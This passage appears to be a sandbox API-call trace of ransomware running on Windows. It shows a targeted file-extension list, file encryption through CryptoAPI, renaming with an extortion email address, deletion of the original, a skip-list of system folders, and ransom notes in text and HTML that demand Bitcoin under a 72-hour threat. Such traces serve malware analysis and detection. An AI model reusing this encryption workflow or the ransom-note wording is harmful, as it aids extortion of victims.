yx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.474] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.475] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.475] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.475] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0171.491] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.492] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0171.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.494] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0171.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.495] CryptHashData (hHash=0xfb95b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0171.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.495] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb95b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9530) returned 1
	[0171.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.495] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0171.496] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.496] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0171.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.496] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0171.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.497] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0171.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.497] CryptDestroyHash (hHash=0xfb95b0) returned 1
	[0171.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.497] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0171.497] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.498] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.498] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0171.499] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0171.500] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.500] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0171.503] CloseHandle (hObject=0x39c) returned 1
	[0171.505] CloseHandle (hObject=0x390) returned 1
	[0171.505] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml")) returned 1
	[0171.508] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml")) returned 0
	[0171.508] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0171.508] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0171.509] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.509] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.511] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}"
	[0171.511] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*"
	[0171.511] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.511] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.511] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0171.511] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.512] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.512] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.515] CloseHandle (hObject=0x388) returned 1
	[0171.516] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.516] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0171.517] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.518] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.518] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.518] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0171.518] CloseHandle (hObject=0x388) returned 1
	[0171.519] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.519] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.519] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.519] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0171.519] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.520] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.520] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0171.523] CloseHandle (hObject=0x388) returned 1
	[0171.523] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.524] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0171.526] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.526] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.526] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.527] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.527] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0171.527] CloseHandle (hObject=0x388) returned 1
	[0171.527] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7fc0aeda, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fc3122f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.528] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*") returned 84
	[0171.528] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.528] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*") returned 0x54
	[0171.528] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.528] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="windows") returned 0x0
	[0171.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.529] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="boot") returned 0x0
	[0171.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.529] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="system volume information") returned 0x0
	[0171.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.529] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.530] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="temp") returned 0x0
	[0171.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.530] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="program files") returned 0x0
	[0171.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.530] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.530] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="appdata") returned 0x0
	[0171.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.531] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="application data") returned 0x0
	[0171.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.531] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="winnt") returned 0x0
	[0171.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.531] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="tmp") returned 0x0
	[0171.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.532] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="cache") returned 0x0
	[0171.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.532] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.532] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="webcache") returned 0x0
	[0171.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.532] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="inetcache") returned 0x0
	[0171.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.533] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="nvidia") returned 0x0
	[0171.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
